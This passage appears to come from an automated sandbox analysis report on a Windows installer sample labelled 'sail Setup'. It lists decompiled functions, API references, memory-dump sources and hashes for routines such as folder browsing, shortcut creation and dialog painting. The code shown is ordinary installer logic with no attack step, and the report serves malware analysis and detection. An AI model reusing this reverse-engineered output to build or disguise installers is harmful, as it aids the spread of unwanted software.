                                                                                                                          0x004042de
                                                                                                                          0x004042e5
                                                                                                                          0x004042ed
                                                                                                                          0x004042f0
                                                                                                                          0x004042f4
                                                                                                                          0x004042fb
                                                                                                                          0x00404303
                                                                                                                          0x0040435b
                                                                                                                          0x00404305
                                                                                                                          0x00404306
                                                                                                                          0x0040430d
                                                                                                                          0x00404312
                                                                                                                          0x00404317
                                                                                                                          0x0040431f
                                                                                                                          0x0040432c
                                                                                                                          0x00404340
                                                                                                                          0x00404344
                                                                                                                          0x00404344
                                                                                                                          0x00404340
                                                                                                                          0x00404349
                                                                                                                          0x00404354
                                                                                                                          0x00404354
                                                                                                                          0x00404303
                                                                                                                          0x00000000
                                                                                                                          0x004042b8
                                                                                                                          0x004042a6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004042ac
                                                                                                                          0x00000000
                                                                                                                          0x00404214
                                                                                                                          0x00404214
                                                                                                                          0x00404220
                                                                                                                          0x0040422a
                                                                                                                          0x00404237
                                                                                                                          0x00404237
                                                                                                                          0x0040423d
                                                                                                                          0x00404246
                                                                                                                          0x0040424f
                                                                                                                          0x00404252
                                                                                                                          0x00404255
                                                                                                                          0x0040425d
                                                                                                                          0x00404260
                                                                                                                          0x00404263
                                                                                                                          0x0040426b
                                                                                                                          0x00404272
                                                                                                                          0x00404279
                                                                                                                          0x004044ed
                                                                                                                          0x004044ff
                                                                                                                          0x004044ff
                                                                                                                          0x00404284
                                                                                                                          0x00000000
                                                                                                                          0x00404284

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00404219
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00404246
                                                                                                                          • SHBrowseForFolderA.SHELL32(?,0041F848,?), ref: 004042FB
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404306
                                                                                                                          • lstrcmpiA.KERNEL32(Call,00420478,00000000,?,?), ref: 00404338
                                                                                                                          • lstrcatA.KERNEL32(?,Call), ref: 00404344
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00404354
                                                                                                                            • Part of subcall function 00405282: GetDlgItemTextA.USER32 ref: 00405295
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                            • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(0041F440,?,?,0000040F,?,0041F440,0041F440,?,00000000,0041F440,?,?,000003FB,?), ref: 0040440D
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404428
                                                                                                                          • SetDlgItemTextA.USER32 ref: 004044A1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                          • API String ID: 2246997448-1655598669
                                                                                                                          • Opcode ID: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
                                                                                                                          • Instruction ID: b374e158efdd7287bf49babe660ec8015a33fdd664c905072b33ae798ddb7db4
                                                                                                                          • Opcode Fuzzy Hash: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
                                                                                                                          • Instruction Fuzzy Hash: 4C9175B1A00219ABDF11AFA1CC84AAF7AB8EF44354F10407BFA04B62D1D77C9A41DB59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E0040553D(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409348, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409348, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                                          0x00402029
                                                                                                                          0x00402033
                                                                                                                          0x0040203c
                                                                                                                          0x00402046
                                                                                                                          0x0040204f
                                                                                                                          0x00402059
                                                                                                                          0x0040205d
                                                                                                                          0x0040205d
                                                                                                                          0x00402062
                                                                                                                          0x00402073
                                                                                                                          0x0040207b
                                                                                                                          0x0040215b
                                                                                                                          0x0040215b
                                                                                                                          0x00402162
                                                                                                                          0x00402081
                                                                                                                          0x00402081
                                                                                                                          0x00402092
                                                                                                                          0x00402096
                                                                                                                          0x0040209c
                                                                                                                          0x004020a6
                                                                                                                          0x004020a8
                                                                                                                          0x004020b3
                                                                                                                          0x004020b6
                                                                                                                          0x004020c3
                                                                                                                          0x004020c5
                                                                                                                          0x004020c7
                                                                                                                          0x004020ce
                                                                                                                          0x004020d1
                                                                                                                          0x004020d1
                                                                                                                          0x004020d4
                                                                                                                          0x004020de
                                                                                                                          0x004020e6
                                                                                                                          0x004020eb
                                                                                                                          0x004020f7
                                                                                                                          0x004020f7
                                                                                                                          0x004020fa
                                                                                                                          0x00402103
                                                                                                                          0x00402106
                                                                                                                          0x0040210f
                                                                                                                          0x00402114
                                                                                                                          0x00402126
                                                                                                                          0x00402135
                                                                                                                          0x00402137
                                                                                                                          0x00402143
                                                                                                                          0x00402143
                                                                                                                          0x00402135
                                                                                                                          0x00402145
                                                                                                                          0x0040214b
                                                                                                                          0x0040214b
                                                                                                                          0x0040214e
                                                                                                                          0x00402154
                                                                                                                          0x00402159
                                                                                                                          0x0040216e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402159
                                                                                                                          0x00402164
                                                                                                                          0x0040288e
                                                                                                                          0x0040289a

                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409348,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 004020AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 123533781-1104044542
                                                                                                                          • Opcode ID: 71453fb45c89770e4f5e9780d50359adef83bdbe6145f3bfd3e7a5e9e412efc0
                                                                                                                          • Instruction ID: ce0b4858a9f81ea3ddc308d80d774a06bef6b406c5dcff46aa6a4b0d76e862c7
                                                                                                                          • Opcode Fuzzy Hash: 71453fb45c89770e4f5e9780d50359adef83bdbe6145f3bfd3e7a5e9e412efc0
                                                                                                                          • Instruction Fuzzy Hash: AE418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403ED7, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00403ED7(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420458 =  *0x420458 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403DF6(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e20
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423e88, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423e88, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420458 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc48 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DB1(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404162();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42365c; // 0x48b9e6
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423eb8; // 0x48a39c
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EA3;
				E00403D8F(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403D8F(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DB1( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DC4(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423e90; // 0x4868b0
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f43c =  *0x41f43c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420458 =  *0x420458 & 0x00000000;
				return 0;
			}




















                                                                                                                          0x00403ee7
                                                                                                                          0x0040400d
                                                                                                                          0x00404069
                                                                                                                          0x0040406d
                                                                                                                          0x00404144
                                                                                                                          0x00404146
                                                                                                                          0x00404146
                                                                                                                          0x0040414c
                                                                                                                          0x0040414c
                                                                                                                          0x0040414f
                                                                                                                          0x00000000
                                                                                                                          0x00404156
                                                                                                                          0x0040407b
                                                                                                                          0x0040407d
                                                                                                                          0x00404087
                                                                                                                          0x00404092
                                                                                                                          0x00404095
                                                                                                                          0x00404098
                                                                                                                          0x004040a3
                                                                                                                          0x004040a6
                                                                                                                          0x004040ad
                                                                                                                          0x004040bb
                                                                                                                          0x004040d3
                                                                                                                          0x004040db
                                                                                                                          0x004040e6
                                                                                                                          0x004040f6
                                                                                                                          0x004040f8
                                                                                                                          0x004040f8
                                                                                                                          0x004040ad
                                                                                                                          0x00404102
                                                                                                                          0x00000000
                                                                                                                          0x0040410d
                                                                                                                          0x00404111
                                                                                                                          0x00404122
                                                                                                                          0x00404122
                                                                                                                          0x00404128
                                                                                                                          0x00404136
                                                                                                                          0x00404136
                                                                                                                          0x00000000
                                                                                                                          0x0040413a
                                                                                                                          0x00404102
                                                                                                                          0x00404018
                                                                                                                          0x00000000
                                                                                                                          0x0040402c
                                                                                                                          0x00404032
                                                                                                                          0x00404038
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040405d
                                                                                                                          0x0040405f
                                                                                                                          0x00404064
                                                                                                                          0x00000000
                                                                                                                          0x00404064
                                                                                                                          0x00404018
                                                                                                                          0x00403eed
                                                                                                                          0x00403ef0
                                                                                                                          0x00403ef5
                                                                                                                          0x00403ef7
                                                                                                                          0x00403f06
                                                                                                                          0x00403f06
                                                                                                                          0x00403f08
                                                                                                                          0x00403f0d
                                                                                                                          0x00403f10
                                                                                                                          0x00403f12
                                                                                                                          0x00403f17
                                                                                                                          0x00403f20
                                                                                                                          0x00403f26
                                                                                                                          0x00403f32
                                                                                                                          0x00403f35
                                                                                                                          0x00403f3e
                                                                                                                          0x00403f43
                                                                                                                          0x00403f46
                                                                                                                          0x00403f4b
                                                                                                                          0x00403f62
                                                                                                                          0x00403f69
                                                                                                                          0x00403f7c
                                                                                                                          0x00403f7f
                                                                                                                          0x00403f94
                                                                                                                          0x00403f96
                                                                                                                          0x00403f9b
                                                                                                                          0x00403fa0
                                                                                                                          0x00403fa5
                                                                                                                          0x00403fa5
                                                                                                                          0x00403fb4
                                                                                                                          0x00403fc3
                                                                                                                          0x00403fc5
                                                                                                                          0x00403fdb
                                                                                                                          0x00403fea
                                                                                                                          0x00403fec
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F62
                                                                                                                          • GetDlgItem.USER32 ref: 00403F76
                                                                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403F94
                                                                                                                          • GetSysColor.USER32(?), ref: 00403FA5
                                                                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FB4
                                                                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FC3
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00403FCD
                                                                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FDB
                                                                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403FEA
                                                                                                                          • GetDlgItem.USER32 ref: 0040404D
                                                                                                                          • SendMessageA.USER32(00000000), ref: 00404050
                                                                                                                          • GetDlgItem.USER32 ref: 0040407B
                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040BB
                                                                                                                          • LoadCursorA.USER32 ref: 004040CA
                                                                                                                          • SetCursor.USER32(00000000), ref: 004040D3
                                                                                                                          • ShellExecuteA.SHELL32(0000070B,open, .B,00000000,00000000,00000001), ref: 004040E6
                                                                                                                          • LoadCursorA.USER32 ref: 004040F3
                                                                                                                          • SetCursor.USER32(00000000), ref: 004040F6
                                                                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404122
                                                                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404136
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                          • String ID: .B$N$open
                                                                                                                          • API String ID: 3615053054-847860968
                                                                                                                          • Opcode ID: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                                                          • Instruction ID: 4310844e4bc5412d85e0e67e924f78a0a7df87fdbfd2fc52009ff806257c2229
                                                                                                                          • Opcode Fuzzy Hash: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                                                          • Instruction Fuzzy Hash: 3161A1B1A40209BFEB109F60DC45F6A7B69EB54715F108036FB05BA2D1C7B8E951CF98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423e90; // 0x4868b0
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "sail Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423e88; // 0x90256
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                                                                                          0x0040100a
                                                                                                                          0x00401039
                                                                                                                          0x00401047
                                                                                                                          0x0040104d
                                                                                                                          0x00401051
                                                                                                                          0x0040105b
                                                                                                                          0x00401061
                                                                                                                          0x00401064
                                                                                                                          0x004010f3
                                                                                                                          0x00401089
                                                                                                                          0x0040108c
                                                                                                                          0x004010a6
                                                                                                                          0x004010bd
                                                                                                                          0x004010cc
                                                                                                                          0x004010cf
                                                                                                                          0x004010d5
                                                                                                                          0x004010d9
                                                                                                                          0x004010e4
                                                                                                                          0x004010ed
                                                                                                                          0x004010ef
                                                                                                                          0x004010ef
                                                                                                                          0x00401100
                                                                                                                          0x00401105
                                                                                                                          0x0040110d
                                                                                                                          0x00401110
                                                                                                                          0x00401112
                                                                                                                          0x00401118
                                                                                                                          0x0040111f
                                                                                                                          0x00401126
                                                                                                                          0x00401130
                                                                                                                          0x00401142
                                                                                                                          0x00401156
                                                                                                                          0x00401160
                                                                                                                          0x00401165
                                                                                                                          0x00401165
                                                                                                                          0x00401110
                                                                                                                          0x0040116e
                                                                                                                          0x00000000
                                                                                                                          0x00401178
                                                                                                                          0x00401010
                                                                                                                          0x00401013
                                                                                                                          0x00401015
                                                                                                                          0x00401019
                                                                                                                          0x0040101f
                                                                                                                          0x0040101f
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32 ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextA.USER32(00000000,sail Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F$sail Setup
                                                                                                                          • API String ID: 941294808-1648923976
                                                                                                                          • Opcode ID: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                                                          • Instruction ID: 87972a138d556bacb88ba9c7fcdf6f47da3ec758f00315b8b39b68d2b09e4b9a
                                                                                                                          • Opcode Fuzzy Hash: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                                                          • Instruction Fuzzy Hash: 6441BC71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C378EA54DFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040572B, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E0040572B() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405CFF(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f10 =  *0x423f10 + 1;
						return _t20;
					}
				}
				 *0x422608 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422080, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421c80, "%s=%s\r\n", 0x422608, 0x422080);
						_t18 =  *0x423e90; // 0x4868b0
						_t56 = _t55 + 0x10;
						E004059FF(_t43, 0x400, 0x422080, 0x422080,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E004056B4(0x422080, 0xc0000000, 4);
						_t53 = _t20;
